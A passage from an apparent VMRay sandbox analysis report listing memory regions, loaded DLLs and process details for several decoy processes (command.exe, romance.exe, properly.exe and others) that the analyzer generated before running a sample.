- |
| pagefile_0x000000007f050000 | 0x7f050000 | 0x7f072fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f075000 | 0x7f075000 | 0x7f075fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f07a000 | 0x7f07a000 | 0x7f07cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f07d000 | 0x7f07d000 | 0x7f07dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #98: command.exe
0
0
| Information | Value |
|---|---|
| ID | #98 |
| File Name | c:\program files\reference assemblies\command.exe |
| Command Line | "C:\Program Files\Reference Assemblies\command.exe" |
| Initial Working Directory | C:\Program Files\Reference Assemblies\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x900 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C58
0x
9D8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000580000 | 0x00580000 | 0x0058ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x00593fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x005c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0070ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000710000 | 0x00710000 | 0x00713fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x00720fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x00731fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x00780fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00793fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x0089ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008e0000 | 0x008e0000 | 0x008effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x008f0000 | 0x009adfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000ab0000 | 0x00ab0000 | 0x00c37fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000c40000 | 0x00c40000 | 0x00cf7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d20000 | 0x00d20000 | 0x00d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x00d7ffff | Private Memory | rw |
|
|
|
- |
| command.exe | 0x00dc0000 | 0x00dd6fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000de0000 | 0x00de0000 | 0x00f60fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f70000 | 0x00f70000 | 0x0236ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x0246ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f010000 | 0x7f010000 | 0x7f10ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f110000 | 0x7f110000 | 0x7f132fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f134000 | 0x7f134000 | 0x7f136fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f137000 | 0x7f137000 | 0x7f137fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f13c000 | 0x7f13c000 | 0x7f13efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f13f000 | 0x7f13f000 | 0x7f13ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #99: abortionauditordirectors.exe
0
0
| Information | Value |
|---|---|
| ID | #99 |
| File Name | c:\program files (x86)\microsoft.net\abortionauditordirectors.exe |
| Command Line | "C:\Program Files (x86)\Microsoft.NET\abortionauditordirectors.exe" |
| Initial Working Directory | C:\Program Files (x86)\Microsoft.NET\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x564 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C54
0x
88C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x005cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x005e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x00603fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0074ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000750000 | 0x00750000 | 0x00753fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x00760fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x00771fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00780000 | 0x0083dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x00840fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x009a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000009b0000 | 0x009b0000 | 0x009effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a10000 | 0x00a10000 | 0x00b0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b10000 | 0x00b10000 | 0x00c97fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ca0000 | 0x00ca0000 | 0x00d57fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e00000 | 0x00e00000 | 0x00e0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e10000 | 0x00e10000 | 0x00f90fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000fa0000 | 0x00fa0000 | 0x0109ffff | Private Memory | rw |
|
|
|
- |
| abortionauditordirectors.exe | 0x01360000 | 0x01376fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001380000 | 0x01380000 | 0x0277ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f580000 | 0x7f580000 | 0x7f67ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f680000 | 0x7f680000 | 0x7f6a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f6a5000 | 0x7f6a5000 | 0x7f6a7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6ab000 | 0x7f6ab000 | 0x7f6adfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6ae000 | 0x7f6ae000 | 0x7f6aefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6af000 | 0x7f6af000 | 0x7f6affff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #100: romance.exe
0
0
| Information | Value |
|---|---|
| ID | #100 |
| File Name | c:\program files\windows media player\romance.exe |
| Command Line | "C:\Program Files\Windows Media Player\romance.exe" |
| Initial Working Directory | C:\Program Files\Windows Media Player\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa48 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C50
0x
A74
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| romance.exe | 0x00150000 | 0x00166fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x00ceffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00cf3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d00000 | 0x00d00000 | 0x00d00fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d10000 | 0x00d10000 | 0x00d23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x00e6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e70000 | 0x00e70000 | 0x00e73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000e80000 | 0x00e80000 | 0x00e80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e90000 | 0x00e90000 | 0x00e91fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00ea0000 | 0x00f5dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000fa0000 | 0x00fa0000 | 0x00fa0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000fb0000 | 0x00fb0000 | 0x00fb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ff0000 | 0x00ff0000 | 0x00ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001100000 | 0x01100000 | 0x0113ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001150000 | 0x01150000 | 0x0115ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001170000 | 0x01170000 | 0x0126ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001270000 | 0x01270000 | 0x013f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001400000 | 0x01400000 | 0x01580fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001590000 | 0x01590000 | 0x0298ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002990000 | 0x02990000 | 0x02a47fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002a50000 | 0x02a50000 | 0x02b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b70000 | 0x02b70000 | 0x02b7ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f220000 | 0x7f220000 | 0x7f31ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f320000 | 0x7f320000 | 0x7f342fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f343000 | 0x7f343000 | 0x7f345fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f346000 | 0x7f346000 | 0x7f346fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f34c000 | 0x7f34c000 | 0x7f34efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f34f000 | 0x7f34f000 | 0x7f34ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #101: markets-represented-quarterly.exe
0
0
| Information | Value |
|---|---|
| ID | #101 |
| File Name | c:\program files (x86)\msbuild\markets-represented-quarterly.exe |
| Command Line | "C:\Program Files (x86)\MSBuild\markets-represented-quarterly.exe" |
| Initial Working Directory | C:\Program Files (x86)\MSBuild\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb18 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C4C
0x
5CC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x009fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000a00000 | 0x00a00000 | 0x00a03fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a10000 | 0x00a10000 | 0x00a10fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a20000 | 0x00a20000 | 0x00a33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a40000 | 0x00a40000 | 0x00a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a80000 | 0x00a80000 | 0x00b7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x00b83fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b90000 | 0x00b90000 | 0x00b90fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00ba1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00bb0000 | 0x00c6dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000cb0000 | 0x00cb0000 | 0x00cb0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cc0000 | 0x00cc0000 | 0x00cc3fff | Pagefile Backed Memory | r |
|
|
|
- |
| markets-represented-quarterly.exe | 0x00cd0000 | 0x00ce6fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x00e6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ee0000 | 0x00ee0000 | 0x00eeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ff0000 | 0x00ff0000 | 0x01177fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001180000 | 0x01180000 | 0x01300fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001330000 | 0x01330000 | 0x0133ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001340000 | 0x01340000 | 0x0273ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002740000 | 0x02740000 | 0x027f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002800000 | 0x02800000 | 0x028fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002920000 | 0x02920000 | 0x0292ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed30000 | 0x7ed30000 | 0x7ee2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee30000 | 0x7ee30000 | 0x7ee52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ee54000 | 0x7ee54000 | 0x7ee56fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee5a000 | 0x7ee5a000 | 0x7ee5cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee5d000 | 0x7ee5d000 | 0x7ee5dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee5f000 | 0x7ee5f000 | 0x7ee5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #102: properly.exe
0
0
| Information | Value |
|---|---|
| ID | #102 |
| File Name | c:\program files (x86)\common files\properly.exe |
| Command Line | "C:\Program Files (x86)\Common Files\properly.exe" |
| Initial Working Directory | C:\Program Files (x86)\Common Files\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8dc |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C48
0x
714
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| properly.exe | 0x002e0000 | 0x002f6fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x0085ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x00863fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x00870fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x00893fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008e0000 | 0x008e0000 | 0x009dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009e0000 | 0x009e0000 | 0x009e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x009f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a00000 | 0x00a00000 | 0x00a01fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00a10000 | 0x00acdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000b10000 | 0x00b10000 | 0x00b10fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b20000 | 0x00b20000 | 0x00bd7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00beffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bf0000 | 0x00bf0000 | 0x00bfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d00000 | 0x00d00000 | 0x00d03fff | Pagefile Backed Memory | r |
|
|
|
